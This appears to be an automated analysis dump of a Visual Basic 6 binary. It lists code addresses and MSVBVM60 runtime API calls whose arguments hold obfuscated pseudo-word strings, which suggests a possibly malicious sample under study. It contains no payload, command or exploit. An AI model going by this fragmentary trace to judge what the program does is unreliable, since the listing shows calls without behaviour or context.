0x0041292f
0x00412930
0x00412931
0x00412934
0x00412941
0x00412942
0x00412943
0x00412944
0x00412945
0x00412948
0x00412955
0x00412956
0x00412957
0x00412958
0x00412959
0x0041295b
0x00412960
0x00412966
0x0041296b
0x0041296b
0x0041296e
0x00412984
0x0041298a
0x00412997
0x004129b9
0x004129b9
0x004129b9
0x00412999
0x00412999
0x0041299e
0x004129a3
0x004129a6
0x004129ac
0x004129b1
0x004129b1
0x004129c6
0x004129c9
0x004129d8
0x004129de
0x004129e5
0x00412a0c
0x00412a12
0x00412a1f
0x00412a4a
0x00412a50
0x00412a5d
0x00412a7f
0x00412a7f
0x00412a7f
0x00412a5f
0x00412a5f
0x00412a64
0x00412a69
0x00412a6c
0x00412a72
0x00412a77
0x00412a77
0x00412a8c
0x00412a95
0x00412a98
0x00412aa5
0x00412ad0
0x00412ad6
0x00412ae3
0x00412b05
0x00412b05
0x00412b05
0x00412ae5
0x00412ae5
0x00412aea
0x00412aef
0x00412af2
0x00412af8
0x00412afd
0x00412afd
0x00412b12
0x00412b1e
0x00412b24
0x00412b33
0x00412b39
0x00412b46
0x00412b68
0x00412b68
0x00412b68
0x00412b48
0x00412b48
0x00412b4d
0x00412b52
0x00412b55
0x00412b5b
0x00412b60
0x00412b60
0x00412b6f
0x00412b76
0x00412b85
0x00412bad
0x00412bb9
0x00412bbc
0x00412bc3
0x00412bd2
0x00412bfa
0x00412c07
0x00412c0e
0x00412c24
0x00412c2a
0x00412c37
0x00412c59
0x00412c59
0x00412c59
0x00412c39
0x00412c39
0x00412c3e
0x00412c43
0x00412c46
0x00412c4c
0x00412c51
0x00412c51
0x00412c67
0x00412c6e
0x00412c84
0x00412c8a
0x00412c97
0x00412cb9
0x00412cb9
0x00412cb9
0x00412c99
0x00412c99
0x00412c9e
0x00412ca3
0x00412ca6
0x00412cac
0x00412cb1
0x00412cb1
0x00412cc6
0x00412ccc
0x00412cde
0x00412ce3
0x00412d09
0x00412d15
0x00412d1e
0x00412d23
0x00412d2a
0x00412d39
0x00412d61
0x00412d6d
0x00412d73
0x00412d89
0x00412d95
0x00412d9b
0x00412daa
0x00412db0
0x00412dbd
0x00412ddf
0x00412ddf
0x00412ddf
0x00412dbf
0x00412dbf
0x00412dc4
0x00412dc9
0x00412dcc
0x00412dd2
0x00412dd7
0x00412dd7
0x00412de6
0x00412df8
0x00412e1d
0x00412e29
0x00412e2c
0x00412e32
0x00412e37
0x00412e3e
0x00412e4e
0x00412e74
0x00412e7a
0x00412e89
0x00412e8f
0x00412e9c
0x00412ebe
0x00412ebe
0x00412ebe
0x00412e9e
0x00412e9e
0x00412ea3
0x00412ea8
0x00412eab
0x00412eb1
0x00412eb6
0x00412eb6
0x00412ec5
0x00412ecc
0x00412ee8
0x00412efa
0x00412f06
0x00412f12
0x00412f18
0x00412f1f
0x00412f47
0x00412f52
0x00412f58
0x00412f65
0x00412f87
0x00412f87
0x00412f87
0x00412f67
0x00412f67
0x00412f6c
0x00412f71
0x00412f74
0x00412f7a
0x00412f7f
0x00412f7f
0x00412f8e
0x00412f9d
0x00412fa3
0x00412fb0
0x00412fd2
0x00412fd2
0x00412fd2
0x00412fb2
0x00412fb2
0x00412fb7
0x00412fbc
0x00412fbf
0x00412fc5
0x00412fca
0x00412fca
0x00412fd9
0x00412fe0
0x00413002
0x00413008
0x00413015
0x00413029
0x00413040
0x0041304d
0x00413054
0x0041305b
0x0041306a
0x00413092
0x0041309f
0x004130a3
0x004130b0
0x004130c4
0x004130d8
0x004130e5
0x004130ec
0x004130f3
0x00413118
0x00413123
0x00413129
0x00413136
0x00413158
0x00413158
0x00413158
0x00413138
0x00413138
0x0041313d
0x00413142
0x00413145
0x0041314b
0x00413150
0x00413150
0x0041315f
0x0041316e
0x00413174
0x00413181
0x004131a3
0x004131a3
0x004131a3
0x00413183
0x00413183
0x00413188
0x0041318d
0x00413190
0x00413196
0x0041319b
0x0041319b
0x004131aa
0x004131b1
0x004131c0
0x004131e8
0x004131f5
0x004131f9
0x00413200
0x00413219
0x00413228
0x00413233
0x00413239
0x00413246
0x00413268
0x00413268
0x00413268
0x00413248
0x00413248
0x0041324d
0x00413252
0x00413255
0x0041325b
0x00413260
0x00413260
0x0041326f
0x00413285
0x00413291
0x00413297
0x0041329e
0x004132ad
0x004132d5
0x004132e2
0x004132e9
0x004132f0
0x004132ff
0x0041330d
0x00413321
0x00413330
0x00413336
0x0041334c
0x00413352
0x0041335f
0x00413381
0x00413381
0x00413381
0x00413361
0x00413361
0x00413366
0x0041336b
0x0041336e
0x00413374
0x00413379
0x00413379
0x0041338f
0x00413396
0x004133a5
0x004133ab
0x004133b8
0x004133da
0x004133da
0x004133da
0x004133ba
0x004133ba
0x004133bf
0x004133c4
0x004133c7
0x004133cd
0x004133d2
0x004133d2
0x004133e1
0x004133f3
0x00413418
0x00413424
0x0041342a
0x00413430
0x00413435
0x0041343c
0x00413461
0x0041346d
0x00413479
0x0041347f
0x0041348c
0x004134a0
0x004134b7
0x004134c4
0x004134cb
0x004134e1
0x004134e7
0x004134f4
0x00413516
0x00413516
0x00413516
0x004134f6
0x004134f6
0x004134fb
0x00413500
0x00413503
0x00413509
0x0041350e
0x0041350e
0x00413523
0x0041352f
0x00413535
0x00413542
0x0041356d
0x00413573
0x00413580
0x004135a2
0x004135a2
0x004135a2
0x00413582
0x00413582
0x00413587
0x0041358c
0x0041358f
0x00413595
0x0041359a
0x0041359a
0x004135af
0x004135bb
0x004135c1
0x004135ce
0x004135e2
0x004135f9
0x00413606
0x0041360d
0x00413614
0x0041361d
0x00413644
0x0041364a
0x00413657
0x00413679
0x00413679
0x00413679
0x00413659
0x00413659
0x0041365e
0x00413663
0x00413666
0x0041366c
0x00413671
0x00413671
0x00413686
0x0041368c
0x00413695
0x0041369a
0x004136b0
0x004136b6
0x004136b8
0x004136c5
0x004136e7
0x004136e7
0x004136e7
0x004136c7
0x004136c7
0x004136cc
0x004136d1
0x004136d4
0x004136da
0x004136df
0x004136df
0x00413703
0x00413709
0x0041370b
0x00413718
0x0041373a
0x0041373a
0x0041373a
0x0041371a
0x0041371a
0x0041371f
0x00413724
0x00413727
0x0041372d
0x00413732
0x00413732
0x00413741
0x00413748
0x0041374f
0x00413756
0x00413769
0x0041376e
0x0041376e
0x00413775
0x0041377f
0x0041379b
0x004137a2
0x004137a5
0x004137aa
0x004137b1
0x004137c0
0x004137ce
0x004137f1
0x004137f7
0x0041380d
0x00413813
0x00413820
0x00413842
0x00413842
0x00413842
0x00413822
0x00413822
0x00413827
0x0041382c
0x0041382f
0x00413835
0x0041383a
0x0041383a
0x0041384f
0x00413852
0x00413861
0x00413867
0x00413876
0x0041387c
0x00413889
0x004138ab
0x004138ab
0x004138ab
0x0041388b
0x0041388b
0x00413890
0x00413895
0x00413898
0x0041389e
0x004138a3
0x004138a3
0x004138b2
0x004138b9
0x004138c8
0x004138f0
0x004138fc
0x00413902
0x00413909
0x00413918
0x00413940
0x0041394d
0x00413954
0x0041396a
0x00413970
0x0041397d
0x0041399f
0x0041399f
0x0041399f
0x0041397f
0x0041397f
0x00413984
0x00413989
0x0041398c
0x00413992
0x00413997
0x00413997
0x004139ad
0x004139b4
0x004139ca
0x004139d0
0x004139dd
0x004139ff
0x004139ff
0x004139ff
0x004139df
0x004139df
0x004139e4
0x004139e9
0x004139ec
0x004139f2
0x004139f7
0x004139f7
0x00413a0c
0x00413a12
0x00413a24
0x00413a29
0x00413a4f
0x00413a55
0x00413a5b
0x00413a64
0x00413a69
0x00413a70
0x00413a7a
0x00413a87
0x00413a88
0x00413a8e
0x00413a8f
0x00413a94
0x00413a99
0x00000000
0x00000000
0x00413a9b
0x00413aa0
0x00413aa7
0x00413ab1
0x00413ab1
0x00413ab2
0x00413ab2
0x00413abf
0x00413ac3
0x00413ac4
0x00413ac9
0x00413ad0
0x00413ada
0x00413ae4
0x00413aee
0x00413af3
0x00413af8
0x00413afe
0x00413aff
0x00413b04
0x00413b0b
0x00413b12
0x00413b19
0x00413b1a
0x00413b1f
0x00413b24
0x00413b2a
0x00413b2b
0x00413b30
0x00413b31
0x00413b36
0x00413b3c
0x00413b3d
0x00413b42
0x00413b43
0x00413b48
0x00413b4e
0x00413b55
0x00413b64
0x00413b71
0x00413b78
0x00413b7f
0x00413b80
0x00413b82
0x00413b87
0x00413b91
0x00413b93
0x00413b99
0x00413ba0
0x00413ba7
0x00413bae
0x00413bcb
0x00413bb0
0x00413bb0
0x00413bb5
0x00413bba
0x00413bbf
0x00413bbf
0x00413bdd
0x00413bf0
0x00413bf7
0x00413bfc
0x00413c00
0x00413c06
0x00413c0d
0x00413c21
0x00413c24
0x00413c26
0x00413c2c
0x00413c33
0x00413c55
0x00413c55
0x00413c55
0x00413c35
0x00413c35
0x00413c37
0x00413c3c
0x00413c42
0x00413c48
0x00413c4d
0x00413c4d
0x00413c62
0x00413c6d
0x00413c6d
0x00413c72
0x00413c79
0x00413c83
0x00413c8a
0x00413c8f
0x00413c95
0x00413c96
0x00413c9b
0x00413c9c
0x00413ca1
0x00413ca8
0x00413cbb
0x00413cc0
0x00413ccd
0x00413cd9
0x00413cdb
0x00413cdd
0x00413ce4
0x00413ceb
0x00413cf5
0x00413cff
0x00413d09
0x00413d13
0x00413d16
0x00413d23
0x00413d24
0x00413d25
0x00413d26
0x00413d27
0x00413d2a
0x00413d37
0x00413d38
0x00413d39
0x00413d3a
0x00413d3b
0x00413d3d
0x00413d42
0x00413d45
0x00413d4a
0x00413d4a
0x00413d4d
0x00413d54
0x00413d59
0x00413d5e
0x00413d64
0x00413d65
0x00413d6a
0x00413d6b
0x00413d70
0x00413d76
0x00413d77
0x00413d7c
0x00413d7d
0x00413d82
0x00413d87
0x00413d8c
0x00413d91
0x00413d97
0x00413d9e
0x00413dad
0x00413dba
0x00413dc1
0x00413dc2
0x00413dc4
0x00413dc9
0x00413dcc
0x00413dd3
0x00413dd5
0x00413dd7
0x00413dde
0x00413de5
0x00413de7
0x00413df2
0x00413df3
0x00413dfa
0x00413dfb
0x00413e08
0x00413e09
0x00413e0a
0x00413e0b
0x00413e0c
0x00413e0e
0x00413e14
0x00413e1f
0x00413e1f
0x00413e24
0x00413e2b
0x00413e30
0x00413e35
0x00413e3a
0x00413e3f
0x00413e44
0x00413e4a
0x00413e4f
0x00413e59
0x00413e5b
0x00413e62
0x00413e69
0x00413e73
0x00413e89
0x00413e8e
0x00413e90
0x00413e96
0x00413e97
0x00413e9c
0x00413ea8
0x00413ea8
0x00413ead
0x00413eb4
0x00413eb9
0x00413ebe
0x00413ec3
0x00413ec9
0x00413ece
0x00413ed8
0x00413ede
0x00413ee5
0x00413eef
0x00413ef9
0x00413f03
0x00413f0d
0x00413f17
0x00413f21
0x00413f2b
0x00413f41
0x00413f4c
0x00413f53
0x00413f5a
0x00413f5b
0x00413f63
0x00413f64
0x00413f6f
0x00413f76
0x00413f7d
0x00413f7e
0x00413f84
0x00413f85
0x00413f87
0x00413f8c
0x00413f8c
0x00413f8f
0x00413fa1
0x00413fa6
0x00413fad
0x00413fae
0x00413fb3
0x00413fb8
0x00413fbe
0x00413fbf
0x00413fc4
0x00413fca
0x00413fd1
0x00413fe0
0x00413fed
0x00413ff4
0x00413ff5
0x00413ff7
0x00413fff
0x00414006
0x00414008
0x0041400a
0x00414011
0x00414016
0x00414016
0x0041401b
0x00414022
0x00414027
0x0041402c
0x00414031
0x00414037
0x0041403c
0x00414046
0x00414048
0x0041404f
0x00414059
0x0041406f
0x0041407a
0x0041407b
0x00414086
0x00414086
0x0041408b
0x00414092
0x00414097
0x0041409d
0x0041409e
0x004140a3
0x004140a4
0x004140a9
0x004140ae
0x004140b4
0x004140bb
0x004140ca
0x004140d7
0x004140dc
0x004140e3
0x004140e5
0x004140e7
0x004140ee
0x004140f5
0x004140ff
0x00414115
0x0041411a
0x0041411c
0x00414122
0x00414123
0x00414128
0x00414134
0x00414134
0x00414139
0x00414140
0x00414145
0x0041414a
0x0041414f
0x00414154
0x0041415a
0x0041415f
0x00414169
0x0041416f
0x00414176
0x0041417d
0x0041419a
0x0041417f
0x0041417f
0x00414184
0x00414189
0x0041418e
0x0041418e
0x004141ac
0x004141b5
0x004141bc
0x004141d0
0x004141d3
0x004141d5
0x004141db
0x004141e2
0x00414204
0x00414204
0x00414204
0x004141e4
0x004141e4
0x004141e6
0x004141eb
0x004141f1
0x004141f7
0x004141fc
0x004141fc
0x00414211
0x00414211
0x00414216
0x0041421d
0x00414222
0x00414227
0x0041422c
0x00414231
0x00414237
0x0041423c
0x00414246
0x0041424c
0x00414262
0x00414268
0x0041426a
0x00414270
0x00414277
0x00414299
0x00414299
0x00414299
0x00414279
0x00414279
0x0041427e
0x00414283
0x00414286
0x0041428c
0x00414291
0x00414291
0x004142a0
0x004142a7
0x004142c4
0x004142a9
0x004142a9
0x004142ae
0x004142b3
0x004142b8
0x004142b8
0x004142d6
0x004142e2
0x004142e8
0x004142fa
0x00414301
0x00414315
0x00414318
0x0041431a
0x00414320
0x00414327
0x00414349
0x00414349
0x00414349
0x00414329
0x00414329
0x0041432b
0x00414330
0x00414336
0x0041433c
0x00414341
0x00414341
0x00414356
0x00414356
0x0041435b
0x00414362
0x00414367
0x0041436c
0x00414372
0x00414377
0x00414381
0x00414387
0x0041438e
0x00414395
0x0041439f
0x004143a9
0x004143b3
0x004143bd
0x004143c7
0x004143d1
0x004143db
0x004143e5
0x004143ef
0x004143f9
0x00414403
0x0041440d
0x00414417
0x0041442d
0x00414438
0x0041443f
0x00414446
0x0041444d
0x00414454
0x0041445b
0x00414462
0x00414463
0x00414470
0x0041447b
0x00414482
0x00414489
0x00414490
0x00414497
0x0041449e
0x004144a5
0x004144a6
0x004144a8
0x004144ad
0x004144b0
0x004144b7
0x004144bc
0x004144c2
0x004144c3
0x004144c8
0x004144c9
0x004144ce
0x004144d4
0x004144db
0x004144ea
0x004144f7
0x004144fc
0x00414503
0x00414505
0x00414507
0x0041450e
0x00414515
0x00414517
0x0041451c
0x0041451c
0x00414522
0x00414529
0x0041452b
0x00414530
0x00414535
0x0041453b
0x0041453d
0x0041453e
0x00414540
0x00414547
0x00414547
0x0041454c
0x00414553
0x00414554
0x004145d1
0x004145d9
0x004145e1
0x004145e9
0x004145f4
0x004145ff
0x0041460a
0x00414615
0x0041461a

APIs

__vbaChkstk.MSVBVM60(?,004016F6), ref: 00412592
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412640
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00412662
#664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 004126E1
__vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 004126F4
#581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 004126FA
__vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 004126FF
__vbaFreeStr.MSVBVM60 ref: 00412737
__vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00412761
#716.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412790
__vbaChkstk.MSVBVM60(?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 00412798
__vbaLateIdSt.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 004127AE
__vbaFreeVar.MSVBVM60(?,00000000,?,Filmselskabets,00000000,?,?,?,?,?,?,?,?,?,004016F6), ref: 004127B9
#516.MSVBVM60(00411624,?,?,?,?,?,?,?,?,?,004016F6), ref: 004127CA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,00000254), ref: 00412810
#676.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00412876
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0041287B
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 004128BD
__vbaChkstk.MSVBVM60 ref: 00412920
__vbaChkstk.MSVBVM60 ref: 00412934
__vbaChkstk.MSVBVM60 ref: 00412948
__vbaLateMemCall.MSVBVM60(?,NzXRmXMzPSdU58,00000003), ref: 00412966
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000718), ref: 004129AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000708), ref: 00412A72
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000708), ref: 00412AF8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8), ref: 00412B5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006FC), ref: 00412C4C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000718), ref: 00412CAC
__vbaStrCopy.MSVBVM60(00000000,?,004101AC,00000718), ref: 00412CDE
__vbaFreeStr.MSVBVM60 ref: 00412D1E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8), ref: 00412DD2
__vbaStrCopy.MSVBVM60(00000000,?,004101AC,000006F8), ref: 00412DF8
__vbaFreeStr.MSVBVM60 ref: 00412E32
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8), ref: 00412EB1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,0000070C,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 00412F7A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000700,?,?,8904D3F8,000000F1,0CDBA990,00005B00,?,8904D3F8,?), ref: 00412FC5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,0000070C,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 0041314B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 00413196
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041325B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413374
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004133CD
__vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 004133F3
__vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413430
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000710,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413509
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000708,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 00413595
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000714,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 0041366C
__vbaOnError.MSVBVM60(000000FF,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79), ref: 00413695
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,000001B8,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 004136DA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,000001BC,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 0041372D
__vbaVarMove.MSVBVM60(?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 00413769
__vbaVarAdd.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 0041379B
__vbaVarMove.MSVBVM60(?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20,00005B06), ref: 004137A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000704,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413835
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006F8,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 0041389E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,000006FC,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 00413992
__vbaHresultCheckObj.MSVBVM60(00000000,?,004101AC,00000718,?,?,?,00000002,?,00008003,?,?,?,?,00000002,?), ref: 004139F2
__vbaStrCopy.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413A24
__vbaFreeStr.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413A64
__vbaVarTstLt.MSVBVM60(00008003,?,?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#), ref: 00413A8F
__vbaVarMove.MSVBVM60(?,?,?,00000002,?,?,0000037B,?,0000037B,?,?,?,?,)#,0000009D,3B889C20), ref: 00413AC4
__vbaStrToAnsi.MSVBVM60(?,bangsternears,98E72E79,?,?,?,00000002,?,?,0000037B,?,0000037B), ref: 00413AFF
__vbaStrToAnsi.MSVBVM60(?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?,00000002,?), ref: 00413B2B
__vbaStrToAnsi.MSVBVM60(?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79,?,?,?), ref: 00413B3D
__vbaSetSystemError.MSVBVM60(00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?,bangsternears,98E72E79), ref: 00413B4E
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,Charcuterieganocephalantu,00000000,?,samtaleemnetsrhes,008310A4,0005F72A,98E72E79,8904D3F8,00000000,?), ref: 00413B82
__vbaNew2.MSVBVM60(004116D4,004183D8,?,?,?,?,?,?,00411624), ref: 00413BBA
__vbaLateMemCallLd.MSVBVM60(?,?,M9uACtmJ7nAtSvje8kbN9w249,00000000), ref: 00413BF7
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00411624), ref: 00413C00
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00411624), ref: 00413C0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,0000000C), ref: 00413C48
__vbaFreeObj.MSVBVM60(00000000,?,004116C4,0000000C), ref: 00413C62
__vbaFreeVar.MSVBVM60(00000000,?,004116C4,0000000C), ref: 00413C6D
__vbaStrToAnsi.MSVBVM60(?,bangsternears, 'y), ref: 00413C96
__vbaSetSystemError.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413CA8
__vbaFreeStr.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413CCD
__vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413D16
__vbaChkstk.MSVBVM60(00000000,?,bangsternears, 'y), ref: 00413D2A
__vbaLateMemCall.MSVBVM60(?,EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25,00000002,00000000,?,bangsternears, 'y), ref: 00413D45
__vbaStrToAnsi.MSVBVM60(?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00413D65
__vbaStrToAnsi.MSVBVM60(?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00413D77
__vbaSetSystemError.MSVBVM60(8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears, 'y), ref: 00413D97
__vbaFreeStrList.MSVBVM60(00000002,?,?,8904D3F8,003DB7DB,00753ECA,00000000,?,encryptions,00000000,?,Statscheferstronhi8,8904D3F8,00000000,?,bangsternears), ref: 00413DC4
#716.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411624), ref: 00413DF3
__vbaChkstk.MSVBVM60(?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411624), ref: 00413DFB
__vbaLateIdSt.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411624), ref: 00413E14
__vbaFreeVar.MSVBVM60(?,00000000,?,sykofanter,00000000,?,?,?,?,?,?,?,?,?,00411624), ref: 00413E1F
__vbaSetSystemError.MSVBVM60(98E72E79,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411624), ref: 00413E4A
__vbaVarDup.MSVBVM60 ref: 00413E89
#600.MSVBVM60(?,00000002), ref: 00413E97
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00413EA8
__vbaSetSystemError.MSVBVM60(0058E1C9,00350DDE), ref: 00413EC9
__vbaVarDup.MSVBVM60(0058E1C9,00350DDE), ref: 00413F41
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 00413F64
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A,0058E1C9,00350DDE), ref: 00413F87
__vbaStrCopy.MSVBVM60(0058E1C9,00350DDE), ref: 00413FA1
__vbaStrToAnsi.MSVBVM60(?,00000000,0058E1C9,00350DDE), ref: 00413FAE
__vbaSetSystemError.MSVBVM60(?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 00413FCA
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,8904D3F8,?,00000000,0058E1C9,00350DDE), ref: 00413FF7
#532.MSVBVM60(LAANELOFTERNE,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411624), ref: 00414016
__vbaSetSystemError.MSVBVM60(000D2930,8904D3F8,98E72E79,8904D3F8,003A3AEA,?,?,?,?,?,?,?,?,?,00411624), ref: 00414037
__vbaVarDup.MSVBVM60 ref: 0041406F
#529.MSVBVM60(?), ref: 0041407B
__vbaFreeVar.MSVBVM60(?), ref: 00414086
__vbaStrToAnsi.MSVBVM60(?,Gooiest4), ref: 0041409E
__vbaSetSystemError.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004140B4
__vbaFreeStr.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 004140D7
__vbaVarDup.MSVBVM60(98E72E79,00000000,?,Gooiest4), ref: 00414115
#600.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414123
__vbaFreeVar.MSVBVM60(?,00000002,98E72E79,00000000,?,Gooiest4), ref: 00414134
__vbaSetSystemError.MSVBVM60(0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041415A
__vbaNew2.MSVBVM60(004116D4,004183D8,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414189
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004141BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000010), ref: 004141F7
__vbaFreeObj.MSVBVM60(00000000,?,004116C4,00000010), ref: 00414211
__vbaSetSystemError.MSVBVM60(8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414237
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041017C,00000160), ref: 0041428C
__vbaNew2.MSVBVM60(004116D4,004183D8), ref: 004142B3
__vbaObjSet.MSVBVM60(?,?,incomprehensible), ref: 00414301
__vbaHresultCheckObj.MSVBVM60(00000000,?,004116C4,00000040), ref: 0041433C
__vbaFreeObj.MSVBVM60(00000000,?,004116C4,00000040), ref: 00414356
__vbaSetSystemError.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 00414372
__vbaVarDup.MSVBVM60(8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 0041442D
#596.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 00414463
__vbaStrMove.MSVBVM60(?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000), ref: 00414470
__vbaFreeVarList.MSVBVM60(00000007,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,?,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,8904D3F8), ref: 004144A8
__vbaStrToAnsi.MSVBVM60(?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004144C3
__vbaSetSystemError.MSVBVM60(00000000,?,Gastriloquy,8904D3F8,8904D3F8,98E72E79,0002A551,0049DB89,98E72E79,00753F16,98E72E79,00000000,?,Gooiest4), ref: 004144D4
